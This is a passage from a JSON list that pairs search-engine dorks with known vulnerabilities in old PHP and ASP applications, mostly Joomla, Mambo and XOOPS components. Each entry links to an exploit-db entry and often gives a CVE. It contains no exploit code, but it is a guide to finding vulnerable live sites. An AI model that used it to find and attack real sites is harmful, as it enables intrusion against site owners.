"inurl:\"com_kochsuite\"", "description": "Joomla Kochsuite Component 0.9.4 Remote File Include Vulnerability - CVE: 2006-4348: https://www.exploit-db.com/exploits/2215"}, {"dork": "inurl:option=articles artid", "description": "Mambo Component Articles (artid) Blind SQL Injection: https://www.exploit-db.com/exploits/5935"}, {"dork": "inurl:\"com_jembed\"", "description": "com_jembed (catid) Blind SQL Injection - CVE: 2010-1073: https://www.exploit-db.com/exploits/11026"}, {"dork": "\"powered by Gradman\"", "description": "Gradman 0.1.3 (agregar_info.php) Local File Inclusion - CVE: 2008-0361: https://www.exploit-db.com/exploits/4926"}, {"dork": "inurl:com_bfsurvey_profree", "description": "Joomla Component BF Survey Pro Free SQL Injection - CVE: 2009-4625: https://www.exploit-db.com/exploits/9601"}, {"dork": "inurl:option=com_cinema", "description": "Joomla component cinema SQL injection Vulnerability: https://www.exploit-db.com/exploits/13792"}, {"dork": "inurl:com_jejob", "description": "Joomla JE Job Component com_jejob LFI Vulnerability: https://www.exploit-db.com/exploits/14063"}, {"dork": "inurl:prog.php?dwkodu=", "description": "Kolifa.net Download Script 1.2 (id) SQL Injection Vulnerability - CVE: 2008-4054: https://www.exploit-db.com/exploits/6310"}, {"dork": "\"Designed and powered by AWS Sports\"", "description": "Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14645"}, {"dork": "inurl:com_eportfolio", "description": "Joomla Component com_eportfolio Upload Vulnerability: https://www.exploit-db.com/exploits/13951"}, {"dork": "intext:\"Parlic Design\" inurl:id", "description": "parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12767"}, {"dork": "[ Powered by SkaDate dating ]", "description": "SkaDate Dating (RFI/LFI/XSS) Multiple Remote Vulnerabilities - CVE: 2009-4700: https://www.exploit-db.com/exploits/9260"}, {"dork": "inurl:com_jotloader", "description": "Joomla Component jotloader 1.2.1.a Blind SQL injection - CVE: 2008-2564: https://www.exploit-db.com/exploits/5737"}, {"dork": "inurl:/wp-content/plugins/fgallery/", "description": "Wordpress plugin fGallery 2.4.1 fimrss.php SQL Injection Vulnerability - CVE: 2008-0491: https://www.exploit-db.com/exploits/4993"}, {"dork": "\u00a9 2010 Powered by Subrion CMS", "description": "Subrion Auto Classifieds Persistent Xss Vulnerability: https://www.exploit-db.com/exploits/14391"}, {"dork": "Powered by Guruscript.com", "description": "Freelancers Marketplace Script Persistent XSS Vulnerability: https://www.exploit-db.com/exploits/14389"}, {"dork": "\"powered by jshop\"", "description": "JShop 1.x - 2.x (page.php xPage) Local File Inclusion Vulnerability - CVE: 2008-1624: https://www.exploit-db.com/exploits/5325"}, {"dork": "\"Powered by TS Special Edition\"", "description": "TS Special Edition v.7.0 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12645"}, {"dork": "inurl:/jobsearchengine/", "description": "i-netsolution Job Search Engine SQL Injection Vulnerability - CVE: 2010-2611: https://www.exploit-db.com/exploits/14079"}, {"dork": "inurl:\"com_jgen\"", "description": "Joomla Component (com_jgen) SQL Injection Vulnerability - CVE: 2010-3422: https://www.exploit-db.com/exploits/14998"}, {"dork": "inurl:com_n-forms", "description": "Joomla Component n-forms 1.01 Blind SQL Injection: https://www.exploit-db.com/exploits/6055"}, {"dork": "\"powered by gelato cms\"", "description": "Gelato (index.php post) Remote SQL Injectio - CVE: 2007-4918: https://www.exploit-db.com/exploits/4410"}, {"dork": "inurl:\"cont_form.php?cf_id=\"", "description": "WebDM CMS SQL Injection Vulnerability - CVE: 2010-2689: https://www.exploit-db.com/exploits/14123"}, {"dork": "allinurl:links.php?t=search", "description": "phpBB Links MOD 1.2.2 Remote SQL Injection - CVE: 2007-4653: https://www.exploit-db.com/exploits/4346"}, {"dork": "inurl:\"com_dateconverter\"", "description": "Joomla Component com_dateconverter 0.1 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14154"}, {"dork": "inurl:\"com_simplefaq\"", "description": "Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability - CVE: 2010-0632CVE: 2010-0632: https://www.exploit-db.com/exploits/11294"}, {"dork": "inurl:com_jb2", "description": "Joomla Component JooBlog 0.1.1 Blind SQL Injection - CVE: 2008-2630: https://www.exploit-db.com/exploits/5734"}, {"dork": "inurl:\"com_dms\"", "description": "Joomla Component com_dms SQL Injection Vulnerability - CVE: 2010-0800: https://www.exploit-db.com/exploits/11289"}, {"dork": "\"powered by: profitCode\"", "description": "PayProCart 1146078425 Multiple Remote File Include Vulnerabilities - CVE: 2006-4672: https://www.exploit-db.com/exploits/2316"}, {"dork": "Powered by UGiA PHP UPLOADER V0.2", "description": "UGiA PHP UPLOADER V0.2 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11261"}, {"dork": "Powered by iBoutique v4.0", "description": "iBoutique 4.0 (cat) Remote SQL Injection Vulnerability - CVE: 2008-4354: https://www.exploit-db.com/exploits/6444"}, {"dork": "\"index.php?option=com_expose\"", "description": "Joomla Component Expose RC35 Remote File Upload Vulnerability - CVE: 2007-3932: https://www.exploit-db.com/exploits/4194"}, {"dork": "inurl:yvcomment", "description": "Joomla Component yvcomment 1.16 Blind SQL Injection - CVE: 2008-2692: https://www.exploit-db.com/exploits/5755"}, {"dork": "\"kims Q - Administrator Login Mode\"", "description": "KimsQ 040109 Multiple Remote File Include Vulnerability: https://www.exploit-db.com/exploits/11960"}, {"dork": "inurl:\"com_hestar\"", "description": "Mambo Component com_hestar Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/9609"}, {"dork": "\"Powered by NovaBoard v1.0.0\"", "description": "NovaBoard 1.0.0 Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/8063"}, {"dork": "inurl:es_offer.php?files_dir=", "description": "Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4715: https://www.exploit-db.com/exploits/4352"}, {"dork": "inurl:index.php?option=com_joomlaconnect_be", "description": "Joomla Component com_joomlaconnect_be Blind Injection Vulnerability: https://www.exploit-db.com/exploits/11578"}, {"dork": "\"Powered by TinyPHPForum v3.61\"", "description": "TinyPHPForum 3.61 File Disclosure / Code Execution Vulnerabilities: https://www.exploit-db.com/exploits/8342"}, {"dork": "intitle:\"CCMS v3.1 Demo PW\"", "description": "CCMS 3.1 Demo Remote SQL Injection - CVE: 2007-6658: https://www.exploit-db.com/exploits/4809"}, {"dork": "\"powered by mcGalleryPRO\"", "description": "mcGalleryPRO 2006 (path_to_folder) Remote Include Vulnerability - CVE: 2006-4720: https://www.exploit-db.com/exploits/2342"}, {"dork": "Powered by Dayfox Designs This is a port of WordPress", "description": "Dayfox Blog 4 Multiple Local File Inclusion Vulnerabilities - CVE: 2008-3564: https://www.exploit-db.com/exploits/6203"}, {"dork": "\"Powered By EgyPlus\"", "description": "EgyPlus 7ml 1.0.1 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-2167: https://www.exploit-db.com/exploits/8865"}, {"dork": "inurl:com_seminar", "description": "Joomla Component Seminar 1.28 (id) Blind SQL Injection - CVE: 2009-4200: https://www.exploit-db.com/exploits/8867"}, {"dork": "allintext:\"Powered By Buddy Zone\"", "description": "Buddy Zone 1.5 Multiple SQL Injection Vulnerabilities - CVE: 2007-3526: https://www.exploit-db.com/exploits/4128"}, {"dork": "inurl:index.php?option=com_ice", "description": "Joomla Component com_ice Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11544"}, {"dork": "Powered by LiteCommerce", "description": "litecommerce 2004 (category_id) Remote SQL Injection Vulnerability - CVE: 2005-1032: https://www.exploit-db.com/exploits/4300"}, {"dork": "\"Web Group Communication Center\"", "description": "Web Group Communication Center (WGCC) 1.0.3 SQL Injection Vuln - CVE: 2008-2445: https://www.exploit-db.com/exploits/5606"}, {"dork": "inurl:com_xewebtv", "description": "Joomla Component Xe webtv (id) Blind SQL Injection - CVE: 2008-5200: https://www.exploit-db.com/exploits/5966"}, {"dork": "inurl:index.php?option=com_paxgallery", "description": "Joomla Component com_paxgallery Blind Injection Vulnerability: https://www.exploit-db.com/exploits/11595"}, {"dork": "Powered by iScripts SocialWare", "description": "Upload Vulnerability and XSS in socialware V2.2: https://www.exploit-db.com/exploits/12448"}, {"dork": "\"(C) This site is NITROpowered!\"", "description": "NITRO Web Gallery SQL Injection Vulnerability - CVE: 2010-2141: https://www.exploit-db.com/exploits/12735"}, {"dork": "\"phpQuestionnaire v3\"", "description": "phpQuestionnaire 3.12 (phpQRootDir) Remote File Include Vulnerability - CVE: 2006-4966: https://www.exploit-db.com/exploits/2410"}, {"dork": "\"generated by Exhibit Engine 1.5 RC 4\"", "description": "Exhibit Engine 1.5 RC 4 (photo_comment.php) File Include - CVE: 2006-5292: https://www.exploit-db.com/exploits/2509"}, {"dork": "powered by connectix boards", "description": "Connectix Boards 0.8.2 template_path Remote File Inclusion - CVE: 2008-0502: https://www.exploit-db.com/exploits/5012"}, {"dork": "inurl:com_ezstore", "description": "Joomla Component EZ Store Remote Blind SQL Injection - CVE: 2008-3586: https://www.exploit-db.com/exploits/6199"}, {"dork": "\"FrontAccounting\"", "description": "FrontAccounting 1.13 Remote File Inclusion Vulnerabilities - CVE: 2007-5117: https://www.exploit-db.com/exploits/4456"}, {"dork": "inurl:\"option=com_elite_experts\"", "description": "Joomla Component (com_elite_experts) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15100"}, {"dork": "inurl:\"com_tupinambis\"", "description": "Joomla/Mambo Tupinambis SQL Injection - CVE: 2009-3434: https://www.exploit-db.com/exploits/9832"}, {"dork": "\"Powered by AMCMS3\"", "description": "Arcadem 2.01 Remote SQL Injection / RFI Vulnerabilties: https://www.exploit-db.com/exploits/4326"}, {"dork": "\"Web Site Design by Red Cat Studios\"", "description": "Realtor WebSite System E-Commerce SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12772"}, {"dork": "allinurl:\"com_cinema\"", "description": "Joomla Component Cinema 1.0 Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5300"}, {"dork": "\"Powered by Clipshare\"", "description": "ClipShare 2.6 Remote User Password Change - CVE: 2008-7188: https://www.exploit-db.com/exploits/4837"}, {"dork": "\"Powered by PHPizabi v0.848b C1 HFP1\"", "description": "PHPizabi 0.848b C1 HFP1 Remote File Upload Vulnerability - CVE: 2008-0805: https://www.exploit-db.com/exploits/5136"}, {"dork": "inurl:com_jejob", "description": "Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12782"}, {"dork": "inurl:\"com_jpodium\"", "description": "Joomla JPodium Component (com_jpodium) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14232"}, {"dork": "intext:\"Powered by: Virtual War v1.5.0\"", "description": "VWar 1.50 R14 (online.php) Remote SQL Injection Vulnerability - CVE: 2006-4142: https://www.exploit-db.com/exploits/2170"}, {"dork": "inurl:index.php/option?com_flexicontent", "description": "Joomla Component com_flexicontent Local File Vulnerability: https://www.exploit-db.com/exploits/12185"}, {"dork": "inurl:option=com_agenda", "description": "Joomla Component com_agenda 1.0.1 (id) SQL Injection Vulnerability - CVE: 2010-1716: https://www.exploit-db.com/exploits/12132"}, {"dork": "inurl:\"index.php?css=mid=art=\"", "description": "EasyWay CMS (index.php mid) Remote SQL Injection - CVE: 2008-2555: https://www.exploit-db.com/exploits/5706"}, {"dork": "\"Powered By Webcards\"", "description": "WebCards 1.3 Remote SQL Injection Vulnerability - CVE: 2008-4878: https://www.exploit-db.com/exploits/6869"}, {"dork": "Powered by Bug Software intext:Your Cart Contains", "description": "BugMall Shopping Cart 2.5 (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2007-3448: https://www.exploit-db.com/exploits/4103"}, {"dork": "Winn ASP Guestbook from Winn.ws", "description": "Winn ASP Guestbook 1.01b Remote Database Disclosure - CVE: 2009-4760: https://www.exploit-db.com/exploits/8596"}, {"dork": "inurl:option=com_n-forms form_id", "description": "Mambo Component n-form (form_id) Blind SQL Injection: https://www.exploit-db.com/exploits/7064"}, {"dork": "intext:\"English for dummies\"", "description": "Mobilelib Gold v3 Local File Disclosure Vulnerability - CVE: 2009-3823: https://www.exploit-db.com/exploits/9144"}, {"dork": "inurl:\"com_lyftenbloggie\" / \"Powered by LyftenBloggie\"", "description": "Joomla Component com_lyftenbloggie 1.04 Remote SQL Injection Vulnerability - CVE: 2009-4104: https://www.exploit-db.com/exploits/10238"}, {"dork": "\"Powered by GGCMS\"", "description": "GGCMS 1.1.0 RC1 Remote Code Execution - CVE: 2007-0804: https://www.exploit-db.com/exploits/3271"}, {"dork": "inurl:index.php?menu=showcat", "description": "ACG-ScriptShop (cid) Remote SQL Injection Vulnerability - CVE: 2008-4144: https://www.exploit-db.com/exploits/6364"}, {"dork": "Powered by minb", "description": "minb 0.1.0 Remote Code Execution - CVE: 2008-7005: https://www.exploit-db.com/exploits/6432"}, {"dork": "\"Powered by phpCC Beta 4.2\"", "description": "phpCC 4.2 beta (base_dir) Remote File Inclusion Vulnerability - CVE: 2006-4073: https://www.exploit-db.com/exploits/2134"}, {"dork": "inurl:index.php?menu=showcat=", "description": "Alstrasoft Forum (cat) Remote SQL Injection Vulnerability - CVE: 2008-3954: https://www.exploit-db.com/exploits/6396"}, {"dork": "intext:elkagroup Image Gallery v1.0", "description": "elkagroup Image Gallery 1.0 Remote SQL Injection Vulnerability - CVE: 2007-3461: https://www.exploit-db.com/exploits/4114"}, {"dork": "\"powered by AMCMS3\"", "description": "Agares PhpAutoVideo 2.21 (articlecat) Remote SQL Injection - CVE: 2008-0262: https://www.exploit-db.com/exploits/4905"}, {"dork": "inurl:\"e107_plugins/my_gallery\"", "description": "e107 Plugin My_Gallery 2.3 Arbitrary File Download Vulnerability - CVE: 2008-1702: https://www.exploit-db.com/exploits/5308"}, {"dork": "\"Powered by BIGACE 2.4\"", "description": "BIGACE 2.4 Multiple Remote File Inclusion Vulnerabilities - CVE: 2008-2520: https://www.exploit-db.com/exploits/5596"}, {"dork": "\"Powered by www.aspportal.net\"", "description": "ASPPortal Free Version (Topic_Id) Remote SQL Injection Vulnerability - CVE: 2008-5268: https://www.exploit-db.com/exploits/5775"}, {"dork": "inurl:\"com_ijoomla_archive\"", "description": "Joomla com_ijoomla_archive Blind SQL Injectio: https://www.exploit-db.com/exploits/8164"}, {"dork": "\"Power by Blakord Portal\"", "description": "Blakord Portal Beta 1.3.A (all modules) SQL Injection Vulnerability - CVE: 2007-6565: https://www.exploit-db.com/exploits/4793"}, {"dork": "inurl:option=com_mv_restaurantmenumanager", "description": "Joomla component mv_restaurantmenumanager SQL injection Vulnerability: https://www.exploit-db.com/exploits/12162"}, {"dork": "inurl:\"com_ajaxchat\"", "description": "Joomla Ajax Chat 1.0 remote file inclusion - CVE: 2009-3822: https://www.exploit-db.com/exploits/9888"}, {"dork": "Powered by: AIH v2.3", "description": "Advanced Image Hosting (AIH) 2.3 (gal) Blind SQL Injection Vuln - CVE: 2009-1032: https://www.exploit-db.com/exploits/8238"}, {"dork": "inurl:/macgurublog_menu/", "description": "e107 Plugin BLOG Engine 2.2 (rid) Blind SQL Injection Vulnerability - CVE: 2008-2455: https://www.exploit-db.com/exploits/5604"}, {"dork": "inurl:\"?page=duyurular_detay&id=\"", "description": "Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities - CVE: 2007-4068: https://www.exploit-db.com/exploits/4224"}, {"dork": "\"X-CART. Powerful PHP shopping cart software\"", "description": "X-Cart ? Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4907: https://www.exploit-db.com/exploits/4396"}, {"dork": "allinurl:offers.php?id=", "description": "B2B Classic Trading Script (offers.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12532"}, {"dork": "\"Powered By HASHE\"", "description": "HASHE! Solutions Multiple SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/11383"}, {"dork": "inurl:we_objectID=", "description": "webEdition CMS (we_objectID) Blind SQL Injection - CVE: 2008-4154: https://www.exploit-db.com/exploits/6281"}, {"dork": "\"2009 Jorp\"", "description": "Jorp 1.3.05.09 Remote Arbitrary Remove Projects/Tasks Vulnerabilities: https://www.exploit-db.com/exploits/8752"}, {"dork": "Powered by Orbis CMS", "description": "Orbis CMS 1.0 (AFD/ADF/ASU/SQL) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/9309"}, {"dork": "inurl:\"index.php?edicion_id=\"", "description": "Delivering Digital Media CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12840"}, {"dork": "inurl:\"CIHUY\"", "description": "Joomla Component (com_joomdle) SQL Injection Vulnerability - CVE: 2010-2908: https://www.exploit-db.com/exploits/14466"}, {"dork": "\"/subcat.php?cate_id=\"", "description": "AJ Forum 1.0 (topic_title.php) Remote SQL Injection - CVE: 2007-1295: https://www.exploit-db.com/exploits/3411"}, {"dork": "Powered by Marinet", "description": "Marinet cms SQL/XSS/HTML Injection Vulnerability: https://www.exploit-db.com/exploits/12577"}, {"dork": "allinurl:clientsignup.php \"classifieds\"", "description": "Living Local 1.1 (XSS-RFU) Multiple Remote Vulnerabilities - CVE: 2008-6530: https://www.exploit-db.com/exploits/7408"}, {"dork": "Powered by TeamCal Pro", "description": "TeamCalPro 3.1.000 Multiple Remote/Local File Inclusion Vulnerabilities - CVE: 2007-6553: https://www.exploit-db.com/exploits/4785"}, {"dork": "\"mumbo jumbo media\" + inurl:\"index.php\"", "description": "Mumbo Jumbo Media OP4 Remote Blind SQL Injection - CVE: 2008-6477: https://www.exploit-db.com/exploits/5440"}, {"dork": "intext:\"pLink 2.07\"", "description": "pLink 2.07 (linkto.php id) Remote Blind SQL Injection - CVE: 2008-4357: https://www.exploit-db.com/exploits/6449"}, {"dork": "\"Powered by Scripteen Free Image Hosting Script V1.2\"", "description": "Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber - CVE: 2008-3211: https://www.exploit-db.com/exploits/6070"}, {"dork": "allinurl:casting_view.php?adnum=", "description": "Modelbook (casting_view.php) SQL Injection Vulnerability - CVE: 2010-1705: https://www.exploit-db.com/exploits/12443"}, {"dork": "inurl:/jobsearchengine/", "description": "I-net Multi User Email Script SQLi Vulnerability: https://www.exploit-db.com/exploits/14095"}, {"dork": "VevoCart Control System", "description": "Asp VevoCart Control System Version 3.0.4 DB Download Vulnerability: https://www.exploit-db.com/exploits/11134"}, {"dork": "inurl:\"com_digifolio\"", "description": "Joomla Component com_digifolio 1.52 (id) SQL Injection Vulnerability - CVE: 2009-3193: https://www.exploit-db.com/exploits/9534"}, {"dork": "\"index.php?option=com_resman\"", "description": "Joomla Component Car Manager 1.1 Remote SQL Injection - CVE: 2007-1704: https://www.exploit-db.com/exploits/3564"}, {"dork": "allinurl:offers_buy.php?id=", "description": "EC21 Clone 3.0 (id) SQL Injection Vulnerability - CVE: 2010-1726: https://www.exploit-db.com/exploits/12459"}, {"dork": "inurl:/jobsearchengine/", "description": "I-net Multi User Email Script SQLi Vulnerability: https://www.exploit-db.com/exploits/14129"}, {"dork": "\"index.php?option=com_rwcards\"", "description": "Joomla Component RWCards 2.4.3 Remote SQL Injection - CVE: 2007-1703: https://www.exploit-db.com/exploits/3565"}, {"dork": "inurl:/jobsearchengine/", "description": "I-net Multi User Email Script SQLi Vulnerability: https://www.exploit-db.com/exploits/14114"}, {"dork": "intext:\"Powered by Atomic Photo Album 1.1.0pre4\"", "description": "Atomic Photo Album 1.1.0pre4 Blind SQL Injection - CVE: 2008-4335: https://www.exploit-db.com/exploits/6574"}, {"dork": "inurl:\"com_fastball\"", "description": "Joomla Fastball component 1.1.0-1.2 SQL Injection - CVE: 2009-3443: https://www.exploit-db.com/exploits/9822"}, {"dork": "Lebi soft Ziyaretci Defteri_v7.5", "description": "Lebi soft Ziyaretci Defteri_v7.5 DB Download Vulnerabilit - CVE: 2010-1065: https://www.exploit-db.com/exploits/11015"}, {"dork": "allinurl:offers_buy.php?id=", "description": "Alibaba Clone Platinum (offers_buy.php) SQL Injection Vulnerability - CVE: 2010-1725: https://www.exploit-db.com/exploits/12468"}, {"dork": "[ Powered by: RadBids Gold v4 ]", "description": "RadBIDS GOLD v4 Multiple Remote Vulnerabilities - CVE: 2009-3529: https://www.exploit-db.com/exploits/9194"}, {"dork": "\"/subcat.php?cate_id=\"", "description": "AJ Auction Pro All Versions (subcat.php) Remote SQL Injection - CVE: 2007-1298: https://www.exploit-db.com/exploits/3408"}, {"dork": "\"Desenvolvido por: Fio Mental\"", "description": "Fiomental & Coolsis Backoffice Multi Vulnerability: https://www.exploit-db.com/exploits/12563"}, {"dork": "\"Powered by ProjectCMS\"", "description": "ProjectCMS 1.0b (index.php sn) Remote SQL Injection Vulnerability - CVE: 2009-1500: https://www.exploit-db.com/exploits/8565"}, {"dork": "Powered by DorsaCms", "description": "DorsaCms (ShowPage.aspx) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6810"}, {"dork": "powered by QT-cute v1.2", "description": "QuickTalk v1.2 (Source code disclosure) Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12817"}, {"dork": "\u00a9 1998 - 2010 Video Battle Script", "description": "PHP Video Battle SQL Injection Vulnerability - CVE: 2010-1701: https://www.exploit-db.com/exploits/12444"}, {"dork": "inurl:\"com_facebook\"", "description": "Joomla com_facebook SQL Injection - CVE: 2009-3438: https://www.exploit-db.com/exploits/9833"}, {"dork": "inurl:/modules/kshop/", "description": "XOOPS Module Kshop 1.17 (id) Remote SQL Injectio - CVE: 2007-1810: https://www.exploit-db.com/exploits/3626"}, {"dork": "\"Jinzora Media Jukebox\"", "description": "Jinzora 2.7 (include_path) Multiple Remote File Include Vulnerabilities - CVE: 2006-6770: https://www.exploit-db.com/exploits/3003"}, {"dork": "inurl:/modules/tinyevent/", "description": "XOOPS Module Tiny Event 1.01 (id) Remote SQL Injection - CVE: 2007-1811: https://www.exploit-db.com/exploits/3625"}, {"dork": "Powered by: AIH v2.1", "description": "Advanced Image Hosting (AIH) 2.1 Remote SQL Injection - CVE: 2008-2536: https://www.exploit-db.com/exploits/5601"}, {"dork": "inurl:\"/modules/jobs/\"", "description": "XOOPS Module Jobs 2.4 (cid) Remote SQL Injection - CVE: 2007-2370: https://www.exploit-db.com/exploits/3672"}, {"dork": "Uploader des fichiers", "description": "Service d'upload v1.0.0 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/10938"}, {"dork": "[ Powered By x10media.com ]", "description": "x10 Media Adult Script 1.7 Multiple Remote Vulnerabilities - CVE: 2009-4730: https://www.exploit-db.com/exploits/9340"}, {"dork": "inurl:/modules/camportail/", "description": "XOOPS Module Camportail 1.1 (camid) Remote SQL Injection - CVE: 2007-1808: https://www.exploit-db.com/exploits/3629"}, {"dork": "Copyright \u00a9 2007 by Horst-D. Kr\u00f6ller \u00b7 CMS: php WCMS", "description": "php wcms XT 0.0.7 Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-5185: https://www.exploit-db.com/exploits/4477"}, {"dork": "inurl:\"com_booklibrary\"", "description": "Joomla Book Library 1.0 file inclusion - CVE: 2009-3817: https://www.exploit-db.com/exploits/9889"}, {"dork": "inurl:\"/modules/myads/\"", "description": "XOOPS Module MyAds Bug Fix 2.04jp (index.php) SQL Injection - CVE: 2007-1846: https://www.exploit-db.com/exploits/3603"}, {"dork": "\"Ladder Scripts by http://www.mygamingladder.com\"", "description": "My Gaming Ladder Combo System 7.0 Remote Code Execution - CVE: 2006-2002: https://www.exploit-db.com/exploits/1707"}, {"dork": "Powered By PHPDug version 2.0.0", "description": "PHPDug version 2.0.0 Cross Site Scripting Vulnerability: https://www.exploit-db.com/exploits/11017"}, {"dork": "allinurl:show_memorial.php?id=", "description": "Memorial Web Site Script (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12351"}, {"dork": "intext:Powered by Mobilelib Gold v3", "description": "Mobilelib Gold v3 (Auth Bypass/SQL) Multiple Remote Vulnerabilities - CVE: 2009-2788: https://www.exploit-db.com/exploits/9327"}, {"dork": "\"php-addressbook\"", "description": "PHP-Address Book 4.0.x Multiple SQL Injection Vulnerabilities - CVE: 2008-2565: https://www.exploit-db.com/exploits/9023"}, {"dork": "inurl:\"com_jsjobs\"", "description": "Joomla Component com_jsjobs 1.0.5.6 SQL Injection Vulnerabilities - CVE: 2009-4599: https://www.exploit-db.com/exploits/10366"}, {"dork": "inurl:com_iproperty", "description": "Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability - CVE: 2010-1721: https://www.exploit-db.com/exploits/12246"}, {"dork": "index.php?option=com_altas", "description": "Joomla Component altas 1.0 Multiple Remote SQL Injection: https://www.exploit-db.com/exploits/6002"}, {"dork": "inurl:\"index.php?module=pnFlashGames\"", "description": "PostNuke Module pnFlashGames 2.5 SQL Injection Vulnerabilities - CVE: 2008-2013: https://www.exploit-db.com/exploits/5500"}, {"dork": "Design by Satcom Co", "description": "Eshopbuilde CMS SQL Injection Vulnerability - CVE: 2009-4155: https://www.exploit-db.com/exploits/10253"}, {"dork": "intitle:\"ppc engine admin login form\"", "description": "PPC Search Engine 1.61 (INC) Multiple Remote File Include Vulnerabilities - CVE: 2007-0167: https://www.exploit-db.com/exploits/3104"}, {"dork": "\"powered by Albinator\"", "description": "Albinator 2.0.6 (Config_rootdir) Remote File Inclusion - CVE: 2006-2182: https://www.exploit-db.com/exploits/1744"}, {"dork": "inurl:\"/modules/library/\"", "description": "XOOPS Module Library (viewcat.php) Remote SQL Injectio - CVE: 2007-1815: https://www.exploit-db.com/exploits/3619"}, {"dork": "inurl:\"/modules/repository/\"", "description": "XOOPS Module Repository (viewcat.php) Remote SQL Injection - CVE: 2007-1847: https://www.exploit-db.com/exploits/3612"}, {"dork": "index.php?option=com_vr", "description": "Joomla Component QuickTime VR 0.1 Remote SQL Injection: https://www.exploit-db.com/exploits/5994"}, {"dork": "\"BioScripts\"", "description": "MiniTwitter 0.2b Multiple SQL Injection Vulnerabilities - CVE: 2009-2573: https://www.exploit-db.com/exploits/8586"}, {"dork": "powered by vBulletin 3.8.6", "description": "vBulletin(R) 3.8.6 faq.php Information Disclosure Vulnerability: https://www.exploit-db.com/exploits/14455"}, {"dork": "Powered by 2532|Gigs v1.2.2", "description": "2532|Gigs 1.2.2 Stable Multiple Remote Vulnerabilities - CVE: 2008-6901: https://www.exploit-db.com/exploits/7510"}, {"dork": "\"Powered by bp blog 6.0\"", "description": "BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability - CVE: 2008-2554: https://www.exploit-db.com/exploits/5705"}, {"dork": "inurl:\"com_soundset\"", "description": "Joomla CB Resume Builder SQL Injection - CVE: 2009-3645: https://www.exploit-db.com/exploits/10064"}, {"dork": "inurl:\"/modules/zmagazine/\"", "description": "XOOPS Module Zmagazine 1.0 (print.php) Remote SQL Injection - CVE: 2005-0725: https://www.exploit-db.com/exploits/3646"}, {"dork": "Powered by iScripts eSwap.", "description": "iScripts eSwap v2.0 sqli and xss vulnerability: https://www.exploit-db.com/exploits/13740"}, {"dork": "\"Powered by Online Grades\"", "description": "Online Grades & Attendance 3.2.6 Multiple Local File Inclusion Vulns - CVE: 2009-2037: https://www.exploit-db.com/exploits/8853"}, {"dork": "inurl:/modules/wflinks", "description": "XOOPS Module WF-Links 1.03 (cid) Remote SQL Injection - CVE: 2007-2373: https://www.exploit-db.com/exploits/3670"}, {"dork": "inurl:\"/modules/myconference/\"", "description": "XOOPS Module MyConference 1.0 (index.php) SQL Injection - CVE: 2007-2737: https://www.exploit-db.com/exploits/3933"}, {"dork": "inurl:\"com_gameserver\"", "description": "Joomla Component com_gameserver 1.0 (id) SQL Injection Vulnerability - CVE: 2009-3063: https://www.exploit-db.com/exploits/9571"}, {"dork": "inurl:com_annonces", "description": "Joomla Component com_annonces Upload Vulnerability: https://www.exploit-db.com/exploits/13748"}, {"dork": "inurl:\"fclick.php?fid\"", "description": "Fast Click (1.1.3 , 2.3.8) (show.php) Remote File Inclusion - CVE: 2006-2175: https://www.exploit-db.com/exploits/1740"}, {"dork": "\"powered by DreamAccount 3.1\"", "description": "DreamAccount 3.1 (auth.api.php) Remote File Include - CVE: 2006-6232: https://www.exploit-db.com/exploits/1954"}, {"dork": "allinurl:\"article.download.php\"", "description": "Star Articles 6.0 Remote File Upload Vulnerability - CVE: 2008-7076: https://www.exploit-db.com/exploits/7251"}, {"dork": "inurl:com_jp_jobs", "description": "Joomla Component com_jp_jobs 1.2.0 (id) SQL Injection Vulnerability - CVE: 2010-1350: https://www.exploit-db.com/exploits/12191"}, {"dork": "\"Cms.tut.su, 2009 g.\"", "description": "CMS Chainuk 1.2 Multiple Remote Vulnerabilities - CVE: 2009-2333: https://www.exploit-db.com/exploits/9069"}, {"dork": "\"Powered By Aqua Cms\"", "description": "Aqua CMS (username) SQL Injection Vulnerability - CVE: 2009-1317: https://www.exploit-db.com/exploits/8432"}, {"dork": "inurl:\"com_jbudgetsmagic\"", "description": "Joomla com_jbudgetsmagic SQL injection vulnerability - CVE: 2009-3332: https://www.exploit-db.com/exploits/9723"}, {"dork": "inurl:\"com_soundset\"", "description": "Joomla Soundset 1.0 SQL Injection - CVE: 2009-3644: https://www.exploit-db.com/exploits/10067"}, {"dork": "Powered by MyPHP Forum v3.0", "description": "MyPHP Forum 3.0 (Final) Remote SQL Injection Vulnerability - CVE: 2008-0099: https://www.exploit-db.com/exploits/4831"}, {"dork": "\"Powered by CMS.GE\"", "description": "Binn SBuilder (nid) Remote Blind SQL Injection Vulnerability - CVE: 2008-0253: https://www.exploit-db.com/exploits/4904"}, {"dork": "\"Site powered by GuppY\"", "description": "GuppY 4.6.3 (includes.inc selskin) Remote File Inclusion Vulnerability - CVE: 2007-5844: https://www.exploit-db.com/exploits/4602"}, 